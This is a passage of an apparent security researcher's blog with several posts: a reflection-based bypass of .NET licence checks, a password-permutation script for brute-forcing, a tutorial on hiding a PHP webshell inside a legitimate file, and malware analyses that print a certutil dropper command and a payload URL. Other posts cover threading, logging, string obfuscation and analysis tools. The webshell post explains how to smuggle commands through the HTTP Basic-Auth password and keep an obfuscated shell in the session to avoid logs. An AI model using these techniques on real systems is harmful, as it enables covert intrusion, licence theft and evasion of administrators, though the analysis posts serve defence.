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.NET code protection, your are doing it wrong

In the past years I have audited various .NET programs in order to verify if it was possible to bypass the license registration mechanism. The most used technique is to obfuscate the MSIL in order to avoid decompiling the registration routine and writing a valid keygen.

The problem of this approach is that even if you use a strong code obfuscator (and there are plenty of them available out there) the code can be easly hacked if not designed in a secure way.

A typical solution is composed of a DLL that implements the license check routine which validates if the product is correctly registered. If this check succeeds then a License object is created and returned. In the "most advanced" case the check is repeated every tot seconds.

The problem in this case is how you have designed this mechanism. If you have followed good OO design then I have bad news for you. Consider the following piece of code:

using System;

namespace CodeProtection
    public class License
        public License(String name)
            this.Name = name;

        public String Name { get; private set; }

    public interface ILicenseChecker
        License GetRegisteredLicense();

    public sealed class DefaultLicenseChecker : ILicenseChecker
        public License GetRegisteredLicense()
            return GetRegisteredLicenseFromSecureStore();

        private License GetRegisteredLicenseFromSecureStore()
            // Check if the license is valid, return null on fail. 
            // This code is heavily  obfuscated and difficult to reverse.
            return null;

    public static class LicenseManager
        internal static ILicenseChecker Checker = new DefaultLicenseChecker();

        public static License GetLicense()
            return Checker.GetRegisteredLicense();

    public class Program
        static void Main(string[] args)
            var license = LicenseManager.GetLicense();
            if (license != null)
                Console.WriteLine("Product not licensed");

        private static void CodeToProtect()
            Console.WriteLine("Great stuff done here!");

We want to be sure that the method CodeToProtect will be executed only if the license is valid. To do this the code follows a good OO design, it uses an interface in order to decouple the contract from the effective implementation. This allows the developer to use a moked version ofย  ILicenseChecker during the development and to switch to the final implementation when needed.

If you release that code it is higly probable that it will be hacked in a very easy way. To hack that code it is not necessary to modify the MSIL or to use more complex stuff like the CLR Memory Diagnostics. It is possible to write a bypass by using only plain reflection, like this one:ย 

using System.Reflection;
using CodeProtection;

namespace CodeProtectionBypass
    class Program
        static void Main(string[] args)
            var licenseManagerType = typeof(LicenseManager);
            var checkerProperty = licenseManagerType.GetField("Checker", 
                BindingFlags.NonPublic | BindingFlags.Static);

            checkerProperty.SetValue(null, new HackedLicenseChecker());

            // run the program

    public sealed class HackedLicenseChecker : ILicenseChecker
        public License GetRegisteredLicense()
            return new License("Hacked");

When you need to design the code that will check the validity of your license, follow these simple advices:
  • Use sealed classes to avoid someone else extending your class in a malicious way
  • Don't use Interface or Abstract class as field or property in the license check code, that will prevents others to replace your objects via reflection
  • Insert the validation code in the same assembly where it is used, and declare the methods internal or private. This allow the obfuscator to properly obfuscate the code and the routine names, this isn't possible if the method is public


Words permutation for passwords generation

When you are performing a password bruteforcing you may have some hints on the password format, of course it is a pity not to exploit this information. During one of my test I noticed that a lot of passwords were based on some year number plus some words combination, like mimmo1983 or oracle2010db.

In order to use this knowledge I have created a little F# script that combines the inputs lists values in order to create all possible permutations. I am pretty sure that you can do the same with John The Ripper, but I couldn't miss the opportunity to write some F# code. Of course you can use the code for other purposes, even not malicious ones!

let combineValues (listOfList: _ list list) =
    let indexArray = Array.zeroCreate(listOfList.Length)

    let rec combineValuesImpl (listOfList: _ list list) (listIndex: Int32 list) (currentScannedListIndex: Int32) = 
 seq {

  let currentScannedListOverflow =
   let currentList = listOfList.[currentScannedListIndex]
   if listIndex.[currentScannedListIndex] >= currentList.Length  then true
   else false
  if currentScannedListOverflow then
   // update the indexs           
   let newListIndex = Array.copy(listIndex |> Array.ofList)     
   newListIndex.[currentScannedListIndex] <- newListIndex.[currentScannedListIndex] + 1

   // zeroes the previous index
   for i in [0 .. currentScannedListIndex] do                        
    newListIndex.[i] <- 0

   // update the next list index
   let updateNextIndex = ref true
   for i in [currentScannedListIndex+1 .. listIndex.Length-1] do
    if !updateNextIndex then
     let li = listIndex.[i] + 1
     if li >= listOfList.[i].Length then
      newListIndex.[i] <- 0
      newListIndex.[i] <- li
      updateNextIndex := false

   if not(!updateNextIndex) then
    yield! combineValuesImpl listOfList (newListIndex |> List.ofSeq) 0
   // calculate value
   let newCombination = Array.zeroCreate<_>(listOfList.Length)
   for i in [0..listOfList.Length-1] do
    let listValIndex = listIndex.[i]
    let listVal = listOfList.[i].[listValIndex]
    newCombination.[i] <- listVal
   yield newCombination
   // update the indexs           
   let newListIndex = Array.copy(listIndex |> Array.ofList)     
   newListIndex.[currentScannedListIndex] <- newListIndex.[currentScannedListIndex] + 1

   // iterate
   yield! combineValuesImpl listOfList (newListIndex |> List.ofSeq) currentScannedListIndex

    combineValuesImpl listOfList (indexArray |> List.ofArray) 0
Follow an example of usage:
for test in (combineValues [["oracle"; "tomcat"]; ["password"; "secret"]; ["letmein"; "qwerty"; "123456"]]) do
    printf "%s-%s-%s\n" test.[0] test.[1] test.[2]

which produce the following result
if you want to try it (maybe with your custom words list) checkout this link.


Porting of AsyncOneManyLock to F#

If you have read the awesome book by Jeffrey Richter CLR via C# 4 ed. you have discovered that there are more optimal ways for thread synchronization than the one provided by the BCL. One of them is the use of new asynchronous capabilities in order to create an asynchronous synchronization primitive. In the book it is presented an AsyncOneManyLock which is used for thread synchornization for code with a high demand for responsiveness and scalability.
If you are an F# developer you know that the F# Asynchornous Workflowย  and the Task Parallel Library are different, so I decided to port this useful piece of code to F# and show you how to use it with an example.

You can download the source code from here.

A simple example of usage of AsyncOnManyLock, we try to synchronize the access to a shared list from different kind of consumers as follows:

open System
open System.Collections.Generic
open System.Threading
open System.Threading.Tasks
open AP.Threading

let main argv = 
    let asyncOneManyLock = new AsyncOneManyLock()
    let rnd = new Random()
    let col = new List()
    async {
        while(true) do 
            let! discard = asyncOneManyLock.WaitAsync(OneManyMode.Shared) |> Async.AwaitTask
            let elem = col |> Seq.head
            printfn "col[0]=%d; col.Count=%d" elem col.Count

    } |> Async.Start

    async {
        while(true) do            
            let! discard = asyncOneManyLock.WaitAsync(OneManyMode.Exclusive) |> Async.AwaitTask
            let numOfElement = rnd.Next(col.Count - 1)
            if numOfElement > 0 then
                col.RemoveRange(0, numOfElement)

    } |> Async.Start

    async {
        while(true) do  
            let! discard = asyncOneManyLock.WaitAsync(OneManyMode.Exclusive) |> Async.AwaitTask
            col.Insert(0, rnd.Next())

    } |> Async.RunSynchronously


The example creates three concurrent tasks that try to access a shared list to read/delete or update the contained items. If the access is of read type then a simple shared lock is sufficient, but in order to modify the list you must access the lock in an exclusive mode. In order to use the TPL with the Async builder you must pass the Task to the Async.AwaitTask function.

That's all, now you can benefit of a highly efficient, not blocking, threat synchronization component.

CryptoPHP Vs Tempesta

I have recently published a new static analysis tool (Tempesta), useful to analyze PHP source code in order to identify a possible malicious behavior. The project is still in its early stage so I carefully monitor the files that are submitted and what could be the cause of possible issues. One of these files is the infamous CryptoPHP backdoor (Fox-IT report).

The submitted sample initially hasn't produced any results, mainly due to the fact that the sample is not a valid PHP code (ok, ok, there was also a bug in Tempesta that prevented the analysis :P).

The sample is composed of only three classes definitions without any objects instantiation code. I decided to take a closer look at this file in order to see if Tempesta was able to analyze it.

The first step was to fix the syntax by closing all the unbalanced parenthesis. Then, I have added three lines of code that just instantiate each class in a correct way.

The first submission didn't returne any meaningful result. By inspecting the code more carefully it was easy to find a call to the function curl_setopt, with high chance this means that inside the file there should also be a list of contacted domains. This was confirmed by the following piece of code that builds the array of the domains to contact:

foreach ($this->uQfIZmMpqyjCaRQMgMoc as $ZRhtpGOgTZTZRdeSYVBw) { $ANVoslonRNQSwwQloQTx[] = base64_decode(str_rot13(strrev($ZRhtpGOgTZTZRdeSYVBw))); }
However, by continuing to inspect the code, the following snipped is executed:

foreach ($eaRKAIVvmthhlFyDIslv as $emDnXOMHIUCHXVocAIgZ) { $ANVoslonRNQSwwQloQTx[] = $JKBGKZwspUYvdkeoetY[$emDnXOMHIUCHXVocAIgZ]; } return $ANVoslonRNQSwwQloQTx;

where $JKBGKZwspUYvdkeoetY is the array populated in the previous snipped and containing the decoded domains, $eaRKAIVvmthhlFyDIslv is an opaque value and $ANVoslonRNQSwwQloQTx is the final array containing the domains that will receive the stolen data. In this specific case, without knowing exactly the value of the $eaRKAIVvmthhlFyDIslv variable, we are not able to populate correctly the array variable $ANVoslonRNQSwwQloQTx, with the result that we can't identify the list of contacted domains. This is a tipical case of the limitation of the static analysis tools (or at least of the current used static analysis approach).

However, not everything is lost. By inserting some more fine grained code inspection during the simulation we were able to identify the list of domains.

You can find the analysis of the sample at: http://enkomio.com/tempesta/#/scan/bbe1de38-a798-4f0a-99c3-1e0f1dee07b3

Update Here is another analysis of a CryptoPHP backdoor: http://enkomio.com/tempesta/#/scan/18a7b126-31a8-4048-b032-80fe50b0ae72

New Fluent interface in Fslog

Fslog is a simple yet powerful library that can be used to log messages in your program. It was implemented with a semantic approach in mind, and you can find it on GitHub. The initial interface was a bit cumbersome to use, so I decided to implement a more user friendly interface based on the Fluent style. Let see how to use this new interface, the first step is to configure a LogProvider:
open System
open ES.Fslog

let lp = new LogProvider()
let consoleLogger = new ConsoleLogger(LogLevel.Informational)
That piece of code creates and configures a LogProvider with a ConsoleLogger. Now you can create your own LogSource and add it to the LogProvider in order to start to log to the console. Of course you can customize how the log messages are displayed by creating a LogFormatter, like this:
open System
open ES.Fslog
open ES.Fslog.Loggers
open ES.Fslog.TextFormatters

type internal ConsoleLogFormatter() = 
    let getLevelStr(logLevel: LogLevel) =
        match logLevel with
        | LogLevel.Critical      -> "CRIT"
        | LogLevel.Error         -> "ERRO"
        | LogLevel.Warning       -> "WARN"
        | LogLevel.Informational -> "INFO"
        | LogLevel.Verbose       -> "TRAC"
        | _ -> failwith "getLevelStr"
    member this.FormatMessage(logEvent: LogEvent) =
        String.Format("[{0}] {1}", getLevelStr(logEvent.Level), logEvent.Message)            

    interface ITextFormatter with
        member this.FormatMessage(logEvent: LogEvent) =

let customConsoleLogger = new ConsoleLogger(logLevel, new ConsoleLogFormatter())
You can now implement the different log sources where necessary, this is a very easy task thanks to the new fluent interface:
open System
open ES.Fslog

// create the log source
let logSource = 
    log "EntityRepository"
    |> verbose "NoPrint" "I will not be printed due to the current LogLevel value :("
    |> info "Start" "Process started!"
    |> warning "FileNotFound" "Unable to open the file {0}, create it"
    |> warning "DirectoryNotFound" "Unable to list file in directory: {0}. Create it."
    |> error "UnableToCreateFile" "Unable to create the file: {0} in directory: {1}"
    |> critical "DatabaseDown" "Database is not reachable, this is not good!"
    |> build

// add the log source to the log provider

// start to log
logSource?UnableToCreateFile("log.txt", "logDirectory/")
And that's all, you can find more examples in the FluentTests class.

Analyzing a malicious word document was never so easy

As a Threat Analyst I'm often involved in analyzing malicious MS Word documents. This task involve, among the other things, the extraction of the embedded macros in order to be analyzed. Currently there are various tools that allow you to extract the source code of the macro via static analysis, but I found this task pretty boring and time consuming.

Also, the malware authors use various approaches to avoid the insertion of useful information inside the macro source code. A recent article describe some of these techniques.

So I decided to spend some hours and create a program that allows you to:
  • Automatically dump all executed macros
  • Automatically dump all the strings instantiated during the macro execution
  • Automatically dump all the executable dropped by the macro (by string content inspection)
I called it the Macro Inspector, and you can found the source code at https://github.com/enkomio/MacroInspector.

Dump all execute macros

In order to accomplish this task, I had to find the point where the macro source code is read in order to be parsed and executed. After spending some time reversing the VBE7 library I found what seems to be a good point to read the source code:
E8 30070000   CALL 7024428B
8BF0          MOV ESI,EAX
81FE C4880A80 CMP ESI,800A88C4
0F84 CD000000 JE 70243C36
81FE 0D9D0A80 CMP ESI,800A9D0D

After the execution of the CALL instruction we have EDX register points to the line of macro source code just read. We have then a good point to intercept the source of the executed macro.

Dump all instantiated strings

To fulfill this point it was necessary to dig a little bit in the OLE Automation concept. After reading a bit more about the OLE Automation I understood that if I was able to dump all the created BSTR objects I have a good amount of information about the inner working of the executed macro. The BSTR string are managed through various functions, one of the most interested one is the SysFreeString method. By intercepting this method I was able to get all the freed strings created during the macro execution.

Finally, by inspecting the content of the dumped strings I can recognized what could be a valid PE file.

Test on real word malicious documents

In order to intercept the interested code I used the WinAppDbg python module. MacroInspector is very easy to use, just run the python program and open the malicious WORD document. The MacroInspector will loop forever until a new WINWORD process is found.

For all my test I used MS Office 2013, it could happen that for different office version the code to read the macro source may change and then the program it is not able to set the breakpoint.

I decided to try the program with some of the malicious files presented in the Virus Bulletin article. For each sample I executed the macro_inspector program, opened the malicious document, enabled the macro and then closed the document (this last step ensure that events associated with closing action are executed).

Evading macro code extraction I

Hash: 7888b523f6b8a42c8bfad0a2fd02ba6e7837299fbc3d6a2da6bea20f302691f7
By extracting the macros from this document we can notice that no useful information are retrieved. But if we take a look at the dumped strings we can easily identify the following useful information:
String: http:/
String: http://
String: http://w
String: http://ww
String: http://www
String: http://www.
String: http://www.s
String: http://www.st
String: http://www.stu
String: http://www.stud
String: http://www.studi
String: http://www.studio
String: http://www.studiop
String: http://www.studiopa
String: http://www.studiopan
String: http://www.studiopane
String: http://www.studiopanel
String: http://www.studiopanell
String: http://www.studiopanella
String: http://www.studiopanella.
String: http://www.studiopanella.i
String: http://www.studiopanella.it
String: http://www.studiopanella.it/
String: http://www.studiopanella.it/9
String: http://www.studiopanella.it/9u
String: http://www.studiopanella.it/9uh
String: http://www.studiopanella.it/9uh8
String: http://www.studiopanella.it/9uh87
String: http://www.studiopanella.it/9uh87g
String: http://www.studiopanella.it/9uh87g7
String: http://www.studiopanella.it/9uh87g75
String: http://www.studiopanella.it/9uh87g756
from this log it is pretty clear that the macro is trying to decrypt an url.

Evading macro code extraction - II

Hash: e812350f2f84d1b7f211a1778073e14ae52bc3bded8aeac536170361a608f8fa
Even in this case as in the previous one no useful information are contained in the dumped macro source code. But again, if we take a look at the list of extracted strings we can identify very useful information like the following powershell command:

Evading payload magic signature check & Certutil abuse

Hash: 562994fcbece64bd617e200485eeaa6d43e5300780205e72d931ff3e8ccb17aa
Same story as the previous one :) This time the macro tries to execute a shell command after decrypting its value as showed in the following log excerpt:
String: cmd /c certut
String: cmd /c certutil -decode %TM
String: cmd /c certutil -decode %TMP%\\panda.pf
String: cmd /c certutil -decode %TMP%\\panda.pfx %TM
String: cmd /c certutil -decode %TMP%\\panda.pfx %TMP%\\panda.ex
String: cmd /c certutil -decode %TMP%\\panda.pfx %TMP%\\panda.exe & star
String: cmd /c certutil -decode %TMP%\\panda.pfx %TMP%\\panda.exe & start %TM
String: cmd /c certutil -decode %TMP%\\panda.pfx %TMP%\\panda.exe & start %TMP%\panda.ex
String: cmd /c certutil -decode %TMP%\\panda.pfx %TMP%\\panda.exe & start %TMP%\panda.exe
in the log we can also see a base64 string, that after being decoded present the well know MZ magic value as the first two bytes:


The Macro Inspector is a simple but very useful tool that can really speed up the analysis of Word Document, it is still in its first version, and there is a lot of space for improvement, but I hope that you can find it helpful :)


  1. The Journey of Evasion Enters Behavioural Phase - https://www.virusbulletin.com/virusbulletin/2016/07/journey-evasion-enters-behavioural-phase/
  2. WinAppDbg - http://winappdbg.sourceforge.net/
  3. OLE Automation - https://msdn.microsoft.com/en-us/library/dt80be78.aspx

Hiding PHP Webshell in an effective way

There are many reason why you want to hide your PHP Webshell, for example not being caught by the system administrator during a penetration testing activity. In this post I'll propose a possible approach on how to do it.

Let's consider this scenario:
  • you are able to create a PHP file in the web root of the web server (for example by exploiting an arbitrary file upload, a RCE and so on...)
  • you want to use a shell that is a bit more complete than: eval($_GET['c'])
  • you want to be as stealth as possible (speaking of both artifacts left on the filesystem and at a network level)
The first step is the creation of the PHP file that will accept our input. This file should be very small and possibly with no direct reference to code execution functions. Sucuri wrote some blog posts about possible ways to execute PHP code in an unusual way ([1], [2]), but in my opinion there is a clever way to execute PHP code by using "Variable functions" ([3], [4]).

This idea is pretty simple, let us see an example:
$fun = 'strrev';
print $fun('Hello');
The result will be: olleH

Cool, so we can create something like:
$f = $_GET['c'];
and we can pass as c = eval and as p = <my evil code>. Unfortunately it will not work :\ From the Variable functions page we can read:

"Variable functions won't work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like. Use wrapper functions to employ any of these constructs as variable functions."

Among the excluded functions there is also eval :( Ok, not too bad, if you know PHP, you will also know that there is the assert function that has a very similar behavior to eval and it is allowed :)

So, now we have a very simple PHP code that can execute arbitrary code with a very minimal footprint. The best choice would be to alter a legit .PHP file and append our short code to it, in this way no new files will be created on the file system. Now, our second concern is to cover our network trace.

To do this, we can opt for the GET method and pass the data via query string. This is probably the worst option since the query string is logged by default in the log web server.

As an alternative we can use the POST method for our communication, but if you have added the PHP code to a legit page that doesn't accept POST data, this could look suspicious and raise the attention of the administrator. Also in a log file the POST requests are considerably less that the GET requests, this fact can be spotted easily by a system administrator.

We should find something that is considered a bad practice to be logged, something that, if implemented, could be classified as the CWE-532: Information Exposure Through Log Files. Yes, you got it, we will use a password field :) To be more precise the HTTP Basic Authorization Header. This value is also encoded in base64 and can be accessed from PHP without any need to do a decode first. So, in the end our code will be something like:

 if (isset($_SERVER['PHP_AUTH_PW'])) 
  $a = explode("|", $_SERVER['PHP_AUTH_PW']); 

Now we need just one last step, the code that we want to execute should be user-friendlier than just that raw shell but we don't want to store it in a separate file in the web root, we need to find another place to store it and that can be easily accessed by PHP.

The perfect solution seems to be the SESSION object. This object is typically serialized in a file in the temp directory (as default configuration), so it is very unlikely that a system administrator takes a look at those files for no reason.

Let's have a brief recap:
  1. we have a very short and simple PHP code, possibly embedded inside a legit PHP file
  2. we will use the Autorization header to communicate with our code, this will avoid to have our data logged
  3. we will store the big PHP shell in the user session in order to be called later
Let's suppose that $webshell is the content that we want to store in the user session (a shell C99 style). Our first request will store the code in the user session. We will send as HTTP Basic password the following content:
  0                  1                     2                3
The request will call the assert function (0), which in turn will call the eval function (1) (this is done to overcome the Variable Functions limitation) on a base64 decoded string (INSTALLER) which has this content:
$a = explode("|", $_SERVER['PHP_AUTH_PW']);
$_SESSION[$a[2]] = $a[3];
This code just extracts the session key name from the data (2), the base64 encoded PHP web shell (3) (the content of $webshell) and save it in the user session. Now we have a PHP webshell in our session that is just waiting to be invoked :)

We can do this by sending the following data:
where the content of INVOKE is:
if (array_key_exists("SESSION_KEY", $_SESSION))
    function xor_deobf($str, $key)
       $out = '';
       for($i = 0; $i 

Basically it verifies that the given SESSION_KEY is present and if so its content is executed. I have used a simple XOR obfuscation layer to be even more stealthy. 

Of course, $webshell should also use the same communication channel in order to be stealth, otherwise you will loose your benefit :)


I hope that you have found this simple post useful. I created a simple python script that it is able to communicate with my code and execute commands.

You can find it at: https://gist.github.com/enkomio/c6db9cb690bbeac1476fb3e56bf7c1a4

You can invoke it with the following command:
phquirk.py http://www.example.com/legit_file_with_my_code.php "print 'Hello from my web shell';"
The result is:
[+] Using session value: PHPSESSID=d22838ce1683e0c9f7f634b10b
[+] Encryption key: d51313ea1fd9233dfe8c40eacfde35e7290aaec8533cc0dd78
[+] Saved command in user session
[+] Command result: Hello from my web shell


[1] PHP Backdoors: Hidden With Clever Use of Extract Function - https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

[2] PHP Callback Functions: Another Way to Hide Backdoors - https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html

[3] Variable functions - http://php.net/manual/en/functions.variable-functions.php

[4] A Look Into Creating A Truley Invisible PHP Shell - https://thehackerblog.com/a-look-into-creating-a-truley-invisible-php-shell/

Using a Mealy automata for string obfuscation

Obfuscating string is a very important aspect if you want to protect sensitive information. In the following post I'll present an alternative method to obfuscate strings by using a Mealy automata.

You can find the full source code of the project in this Github project


From Wikipedia ([1]) we can read that a Mealy machine is a finite-state machine whose output values are determined both by its current state and the current inputs. There are plenty of information on the internet about this concept, so I will not go into further details. What is interesting to us is that by having an automata, we can give it a specific input and have the computed string as output.

The idea of using a Mealy machine to obfuscate strings is not new and it was already presented in [2]. Unfortunately the book doesn't explains how to create a Mealy automata in an automatic way. As the task of creating an automata manually, for each of the strings, is very time consuming, I felt that a very important part was missing.
In the following paragraphs I'll try to fill this hole by providing you with a possible implementation.
In the final section we will see an example that uses the code presented in the book.

Why using a new method?

If you have ever reversed a binary which use obfuscation you might have noticed that most of the obfuscation strategies are based on using some kind of know cryptographic algorithm or by using a custom encoder based on ADD/XOR/ROL instructions. Both cases have advantages and disadvantage (using a XOR obfuscation is a weak method, see [3]), but both are based on the assumption that they have the data encoded/encrypted in some way in the binary. In our case we convert the data in "code" that generates the decoded value at runtime.

For our purpose we will use a Mealy machine which has 0/1 as input. This choice will allow us to encode each letter with a bit, greatly reducing the input representation.


Let's consider a simple automata (created with [4]):

On each arrow there is the input and the associated output. If we consider the state 0 as the initial one and pass the input string: 0 1 1 0 1 0 0 we will receive as output the string ANTONIA.

In order to automatically generates the automata I found that starting by considering the input was a pretty challenging task. So I changed strategy and considered the output in order to create the automata. For each character, the choice is between creating a new state, or connecting to one of the already existing states. You can find the full F# source code implementation with a test example here.


Now that we have an algorithm to generate the automata, let's try to obfuscate some strings. Since the implementation was done in F# I'll create an helper method to print the automata in an handy way in order to import the result in a C program. Let's consider the string supersecretpassword. The automata and the input generated from this string are (the result may be different on your machine):
Input text: supersecretpassword

Input: 1,1,0,0,0,1,0,0,0,0,1,0,1,0,1,1,1,1,0, Int: 250915

Output: {{'e', 's'}, {'e', 'u'}, {'p', 'e'}, {'e', 'a'}, 
        {'r', 'r'}, {'c', 'w'}, {'d', 't'}, {'s', 'd'}, 
        {'u', 's'}, {'p', 'w'}, {'a', 'o'}, {'d', 's'}, 
        {'s', 'p'}}

Automata: {{6, 1}, {5, 2}, {3, 2}, {4, 7}, {0, 11}, {4, 12}, 
          {12, 2}, {8, 4}, {12, 9}, {0, 10}, {6, 4}, {12, 7}, 
          {11, 10}}

Since the length of the string is less than 32 characters, we can convert the binary input into a DWORD. Now let's write a C program that reconstruct the given string:

#include "stdafx.h"

void deobfuscate(char* text, int length, int key, char automata[][2], char output[][2])
 int v = 0, state = 0, i = 0;
 for (i = 0; i >= 1;
  text[i] = output[state][v];
  state = automata[state][v];
 text[i] = '\0';

int main()
 char text[20];
 int key = 250915;

 char automata[][2] =
 { { 6, 1 },{ 5, 2 },{ 3, 2 },{ 4, 7 },{ 0, 11 },
 { 4, 12 },{ 12, 2 },{ 8, 4 },{ 12, 9 },{ 0, 10 },
 { 6, 4 },{ 12, 7 },{ 11, 10 } };

 char output[][2] =
 { { 'e', 's' },{ 'e', 'u' },{ 'p', 'e' },{ 'e', 'a' },
 { 'r', 'r' },{ 'c', 'w' },{ 'd', 't' },{ 's', 'd' },
 { 'u', 's' },{ 'p', 'w' },{ 'a', 'o' },{ 'd', 's' },
 { 's', 'p' } };

 deobfuscate(text, sizeof(text)-1, key, automata, output);

 printf("Output: %s", text);
 return 0;

If we run this code we can see that the string "supersecretpassword" will be displayed in the console :)


I hope that you enjoyed this post as much as I enjoyed to write the code. If you find any errors or you know a better algorithm to implement the Mealy automata just leave a comment or drop me an email ;)


[1] Mealy machine
[2] Surreptitious Software: Obfuscation, Watermarking, and Tamperproofing for Software Protection
[3] XORSearch & XORStrings
[4] Finite State Machine Designer

Shed - Inspect .NET malware like a Sir

When I start to analyze a new malware, there are some initial tasks that provide a lot of useful information to speedup the analysis. Two of them are of particular interest, the extraction of the embedded strings and the dumping of packed binaries. Unfortunately those information are often obfuscated or not so easy to retrieve. In this article I'll present a new tool which is able to analyze .NET programs in order to extract those information in an easy way. Its name is Shed.

You can find the full source code of the project and an already compiled binary in this Github project.


The idea behind this tool is to make the extraction of strings that reside in memory easier and also to dump dynamically loaded binaries. I'll show you how to use Shed in order to analyze a well know .NET RAT malware.

Dump the Heap

When a new object is created, it is saved in the managed heap. This memory area is managed by the .NET runtime, more specifically by the Garbage Collector. It is its responsibility to free unused memory when needed. This specific behavior is very handy for an analyst, since the Garbage Collector will not reclaim the memory if not necessary. In this way we have a good amount of time to inspect the heap and to dump useful objects, like strings or byte array.

Thanks to the powerful Reflection capability provided by .NET, for each stored object we can extract the type and also all associated fields. In this way we can reconstruct the memory representation of complex class that can provide useful insight about the inner working of the malware.

Modules dump

Another interesting aspect when analyzing a malware is the ability to dump dynamically loaded Assemblies. This case is pretty common, since most of the .NET malware store the main Assembly in some kind of encrypted form and load it only at runtime.

It already exists a very useful tool that allow you to dump dynamically loaded Assemblies which is MegaDumper, but since it is not open source (on GitHub you can find a decompiled version) and I have never wrote a PE dumper, I decided to create my own tool :)

In order to dump an Assembly we have to dump the related PE file from memory. This operation can be pretty challenging, a lot depends on how the malware was protected.

A naive approach is identifying the start of the PE file and starting from there read


bytes. The main problem with this approach is that by now most of the malware use Process Hollowing ([1]) to inject its content in a newly created process. This implies that the PE is not mapped in a contiguous memory area, making the read operation not possible.

A better strategy is to parse the PE header and reconstruct the binary by reading all sections from memory.

One important aspect to consider when dump a .NET Assembly is to fix the PE Entry Point. Let us analyze the Entry Point of a managed PE file:
[0x0043d9de]> pd 1
;-- entry0:
0x0043d9de    ff2500204000   jmp dword [sym.imp.mscoree.dll__CorExe
the code jumps to the _CorExe routine. From MSDN ([2]) we can read that:

Initializes the common language runtime (CLR), locates the managed entry point in the executable assembly's CLR header, and begins execution.

So we need to set the Entry Point of the reconstructed binary to a piece of code which jump to this function. Last missing part is to obtain the address of this function. This task can be accomplished by walking the Import Address Table and locating it.

Use cases Agent Tesla (cc518a6c63f56c4891b5e30e8cb97b26)

Let's see how to use Shed in order to analyze a real world malware, an agent Tesla sample analyzed by Forcepoint in [3].

c:\Shed>Shed.exe --timeout 2000 --exe cc518a6c63f56c4891b5e30e8cb97b26.exe
    -=[ Shed .NET program inspector ]=-
Copyright (c) 2017 Antonio Parata - @s4tan

[+] Attached to pid: 160
[+] Created runtime: v2.0.50727.5420
[+] [System.String] 0x278043C: 0|0|0|0|0|0|0|0|0|0|18000|1|skpehostbrowaer.exe|Temp|AXKTOimGsklqIffPCompzbSmVnpwanUmzyjRJTSpqQzJHIASyqoYDvKR|0|0|0|0|0|0|0|IWIOzYrGb|0|0|0|0|0|0|NgjBaJMqu|OEeQOTHIoxSSUapGpFWjxLNzWbe|6|0|
[+] [System.String] 0x2780610: /c echo [zoneTransfer]ZoneID = 2 > 
[+] [System.String] 0x2780668: :ZONE.identifier & exit
[+] [System.String] 0x2780748: <?xml version="1.0" encoding="UTF-16"?><Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">  <RegistrationInfo>    <Date>2014-10-25T14:27:44.8929027</Date>    <Author>[USERID]</Author>  </RegistrationInfo>  <Triggers>    <LogonTrigger>      <Enabled>true</Enabled>      <UserId>[USERID]</UserId>    </LogonTrigger>    <RegistrationTrigger>      <Enabled>false</Enabled>    </RegistrationTrigger>  </Triggers>  <Principals>    <Principal id="Author">      <UserId>[USERID]</UserId>      <LogonType>InteractiveToken</LogonType>      <RunLevel>LeastPrivilege</RunLevel>    </Principal>  </Principals>  <Settings>    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>    <AllowHardTerminate>false</AllowHardTerminate>    <StartWhenAvailable>true</StartWhenAvailable>    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>    <IdleSettings>      <StopOnIdleEnd>true</StopOnIdleEnd>      <RestartOnIdle>false</RestartOnIdle>    </IdleSettings>    <AllowStartOnDemand>true</AllowStartOnDemand>    <Enabled>true</Enabled>    <Hidden>false</Hidden>    <RunOnlyIfIdle>false</RunOnlyIfIdle>    <WakeToRun>false</WakeToRun>    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>    <Priority>7</Priority>  </Settings>  <Actions Context="Author">    <Exec>      <Command>[LOCATION]</Command>    </Exec>  </Actions></Task>
[+] [System.String] 0x2781308: [LOCATION]
[+] [System.String] 0x2781330: schtasks.exe

[+] Saved dynamic module: raobtmNqCzJjZpcUiyDwYSCM
[+] Saved dynamic module: Microsoft.VisualBasic.dll
[+] Result saved to c:\Shed\Result\160
[+] Detached
From the output we can see that a module with a weird name (raobtmNqCzJjZpcUiyDwYSCM) was dumped. This Assembly was decrypted and loaded by the first loader layer.

It is in charge for various operations and it has also a configuration string which is:


specify the time to sleep (18000 milliseconds) and the name to give to the real payload.

Also, it is in charge for ensuring persistence by creating a task with the XML configuration string displayed in the output. Finally, it decrypts the real payload and executes it with a .NET implementation of the RunPE technique which use Process Hollow.

This loader was already analyzed in [4]. By using Shed, we can see that we were able to retrieve a lot of useful information without too much effort.

Moving on, in order to inspect the real payload, I executed the program and waited for the spawn of a new process. After this, I ran Shed against the newly created process as showed below:
c:\Shed>Shed.exe --pid 3652
    -=[ Shed .NET program inspector ]=-
Copyright (c) 2017 Antonio Parata - @s4tan

[+] Attached to pid: 3652
[+] Created runtime: v2.0.50727.5420
[+] [System.String] 0x297A798: <br>VideocardName&nbsp;: 
[+] [System.String] 0x297A7DC: <br>VideocardMem&nbsp;&nbsp;: 
[+] [System.String] 0x297A82C: <br>IP Address&nbsp;&nbsp;:
[+] Saved dynamic module: Microsoft.VisualBasic.dll
[+] Saved dynamic module: Microsoft.JScript.dll
[+] Saved dynamic module: IELibrary
[+] Saved dynamic module: System.Security.dll
[+] Result saved to c:\Shed\Result\3652
[+] Detached
This time the output is pretty huge. Among the dumped modules the most interesting ones are:

IELibray (9759067EDF26E4A4E49B4E228C7DF81C)

It is used to interact with Internet Explorer in order to steal usernames, passwords and cookies, as can be seen by the following image:

no name (6030C0CFC40A6A69857454D5EB41D9FA)

This is the real Agent Tesla module, where we can see the routine in charge for decrypting the stored string:

Heap inspection

As already said, even if the strings are stored in encrypted form they will survive until the Garbage Collector will not reclaim the memory. If we take a look at the JSON file heap.json, we will see (apart from the enormous amount of information dumped) a lot of useful data, like the SMTP server and account used to exfiltrate data:

  "Address": 43845700,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
  "Value": "[email protected]"
  "Address": 43864368,
  "Name": null,
  "Properties": [ ],
  "Reference": 0,
  "Type": "System.String",
